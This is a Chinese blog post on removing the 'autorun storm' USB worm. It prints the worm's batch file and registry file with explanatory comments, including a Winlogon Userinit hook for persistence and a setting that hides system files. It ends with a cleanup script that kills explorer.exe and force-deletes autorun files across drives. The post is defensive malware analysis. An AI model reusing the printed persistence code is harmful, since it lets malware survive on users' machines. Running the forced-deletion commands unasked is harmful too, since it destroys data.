autorun.vbs病毒的清除办法

最新推荐文章于 2022-02-23 15:02:25 发布
最新推荐文章于 2022-02-23 15:02:25 发布
阅读量1.1w 收藏
点赞数
文章标签: system import c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hansbj/article/details/1472736
版权

症状:计算机里面出现一堆autorun为文件名的文件,删除后出现找不到autorun.vbs的提示。我就打开其中的一个文件:Autorun.bat,内容如下:

@echo off  //不显示系统提示符
rem autorun风暴   //病毒名称:autorun风暴
if exist ./autorun.reg regedit /s ./autorun.reg  //如果存在该目录下的autoun.reg注册表文件写入注册表
if not "%1"=="" goto open   //注册表文件导入成功,进入open标记处。
if exist autorun.vbs start WScript.exe autorun.vbs&exit  //如果存在autorun.vbs,则使用WScript.exe将VBS文件运行,然后退出。
if exist %SYSTEMROOT%/system32/autorun.vbs start WScript.exe %SYSTEMROOT%/system32/autorun.vbs&exit  //如果系统目录下的system32内有autorun.vbs,那么用WScript.exe运行VBS,然后退出。
exit  //退出
:open  //标记为open
if not "%1"=="Open" goto next  //如果open成功,进入next标记
start explorer ./   //开始当前目录
exit  // 退出
:next  //标记为netx
if not "%1"=="Over" goto :next2  //如果标记不成功,进入next2标记
if exist ./autorun.bin type ./autorun.bin >C:/autorun.txt&&exit   //如果当前目录存在Autorun.bin,将autorun.bin写入到C盘的autorun.txt文件,然后退出。
if exist %SYSTEMROOT%/system32/autorun.bin type %SYSTEMROOT%/system32/autorun.bin >c:/autorun.txt&&exit  //如果系统目录system32下存在Autorun.bin,将autorun.bin写入到C盘的autorun.txt文件,然后退出。
exit   //退出
:next2     //标记为next2
if "%1"=="-" attrib -s -a -h -r %2/autorun.*    //先标记所有autorun开头的文件为非系统、非只读、非隐藏、非..文件
if "%1"=="+" attrib +s +a +h +r %2/autorun.*  //先标记所有autorun开头的文件为系统、只读、隐藏、..文件
:end   //结束

文件二:Autorun.reg

Windows Registry Editor Version 5.00  //Windows 注册表编辑器 5.00创建
autorun风暴   //autorun风暴
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]
"Userinit"="userinit.exe,autorun.bat"   //在该条目下的userinit上添加一个autorun.bat执行文件。

[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced]
"ShowSuperHidden"=dword:00000000     //不显示隐藏文件。

我倒,这个病毒还真有点搞笑,连杀毒说明书都写好了,不过,作者显然是个好学生,老师教的要写好注释真的没错啊!

杀毒方法:

可以制作一个批处理文件来进行,内容如下:
@echo on
taskkill /im explorer.exe /f
taskkill /im wscript.exe
start reg add HKCU/SOFTWARE/Microsoft/Windows/CurrentVersion/EXplorer/Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f
start reg import kill.reg
del c:/autorun.* /f /q /as
del %SYSTEMROOT%/system32/autorun.* /f /q /as
del d:/autorun.* /f /q /as
del e:/autorun.* /f /q /as
del f:/autorun.* /f /q /as
你的盘符多就多写几个
start explorer.exe

执行它就行了。

hansbj
关注
批处理完成“Autorun病毒免疫”
t0nsha's Blog
06-19 2495
          前段时间“Autorun病毒”肆意泛滥,一时间几乎所有的U盘都成了它的传播载体,系统重装也会因为其他盘被感染而致使其死灰复燃,“Autorun病毒”似乎成了挥之不去的幽灵,本文将通过一个简单的批处理来为您的磁盘打上远离“Autorun病毒”的预防针,让您一劳永逸的免去“Autorun病毒”的烦劳,将以下代码保存为“.bat”文件(如:“Autorun病毒免疫.bat”),然后双
vbs 脚本2
weixin_30511039的博客
04-06 5675
一些很恶作剧的vbs程序代码 作者: 字体:[增加减小] 类型:转载 时间:2013-01-16我要评论 恶作剧的vbs代码,这里提供的都是一些死循环或导致系统死机的vbs对机器没坏处,最多关机重启一下就可以了,将下面的任意一段代码保存为*.vbs即可 操作方法:把代码保存为*.VBS运行即可经本人亲自测试 不会出大问题的,一般都是利用无限循环,不是死循环,...
vbs autorun
04-19
vbs 编写的autorun可以实现u盘打开自动感染,下载后需要将后缀改为.inf
autorun.vbs
zhongyuangong521的专栏
03-26 609
症状:双击盘符无法打开,显示缺少autorun.vbs 解决方法: 1、在cmd窗口粘贴以下命令: @echo on taskkill /im explorer.exe /f taskkill /im wscript.exe start reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersi /v ShowSuperHidden
Windows下的Autorun程序
hxxjxw的博客
12-13 992
// Autorun.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include<windows.h> #include<iostream> using namespace std; char *gstrAutoRun = "[autorun] \ \r\nopen=demo.exe \ \r\nshell\\open ...
autorun.vbs病毒专杀
flash2006的专栏
01-13 2210
autorun.vbs病毒专杀2007-04-17 14:38 因帮一名叫﹀ァ瑶.☆瑶的网友解决Trojan.DL.VBS.Agent的变种病毒编写脚本以下脚本内容由紫色唇膏站长搜集整理完成,公布与大家分享。@echo off title 紫色唇膏Trojan.DL.VBS.Agent变种病毒专杀脚本@e
双击盘符提示“Windows脚本宿主”无法找到脚本文件autorun.vbs的解决办法
einlb60q
01-16 296
双击盘符提示“Windows脚本宿主”无法找到脚本文件autorun.vbs的解决办法 2010年05月16日    关于“autorun.vbs”的问题:   【问题故障描述】:   双击C、D、E盘就会出现一个“Windows脚本宿主”无法找到脚本文件,下面是脚本:D:\autorun.vbs   行: 25   字符: 4   错误: 错误的'Next'   代码:...
Autorun.vbs病毒专杀工具
04-02
这暗示了用户可以下载该压缩包,了解如何使用此工具来检测和消除Autorun.vbs病毒感染,同时可能还提供了预防此类病毒的方法和其他安全建议。 【标签解读】 "Autorun.vbs病毒专杀工具其它知识" 这个标签表明除了专杀...
Autorun.vbs病毒专杀工具.rar
09-26
用户下载并运行这个工具,可以检查和消除系统中可能存在的Autorun.vbs病毒感染。 标签“软件”暗示这可能是一个独立的可执行程序或一套包含多个实用工具的软件包,用于处理与Autorun.vbs病毒相关的安全问题。 在...
深入解析Autorun.vbs病毒专杀工具及使用方法
标题《Autorun.vbs病毒专杀工具》暗示了一款专门用于清除Autorun.vbs病毒的软件工具。Autorun.vbs是一种恶意软件,它利用Windows系统的自动运行功能来传播,通常通过可移动存储介质(如U盘、移动硬盘)感染电脑。该...
autorun.vbs病毒查杀
03-05
Autorun.vbs病毒是一种常见的计算机恶意软件,它利用Windows操作系统中的自动播放功能(Autorun.inf)来传播。这种病毒通常通过U盘、移动硬盘等可移动存储设备进行传播,一旦用户将感染了病毒的设备插入电脑,病毒...
Autorun.vbs病毒专杀工具的下载与使用
Autorun.vbs病毒是一种针对Windows操作系统的病毒,它利用Windows的自动运行功能(Autorun)来自动执行病毒代码。通常这类病毒会隐藏在U盘、移动硬盘或网络共享驱动器中,并通过创建Autorun.inf文件和Autorun.vbs...
vbs开机自启
09-28
可以通过注册表开机自启(不用知道本文件在哪个位置)
病毒autorun.vbs查杀方法
weixin_34268579的博客
11-12 221
最近机器有个怪现象,打开“我的电脑”以后,无论双击哪个盘的图标,系统都会重新打开一个窗口,同时杀毒软件报告:regedit.exe程序试图修改注册表XXX键值,已被拦截。 然 后我打开硬盘各个分区,发现根目录下多出七个文件:autorun.bat autorun.vbs autorun.bin autorun.inf autorun.txt auto...
vbs脚本之开机启动程序
热门推荐
孤鸿寄语
11-08 1万+
本人也是刚学VBS,把一些个人的经验贡献给大家 VBS开机启动对于初学者来说可能有难度,而且在网上很少有详细且正确的完整脚本,本人历经千辛万苦,编出来这个脚本,脚本如下: Dim AutoRunProgram     声明变量 Set AutoRunProgram = WScript.CreateObject("WScript.shell") RegPath ="HKLM\Soft
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 9373
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值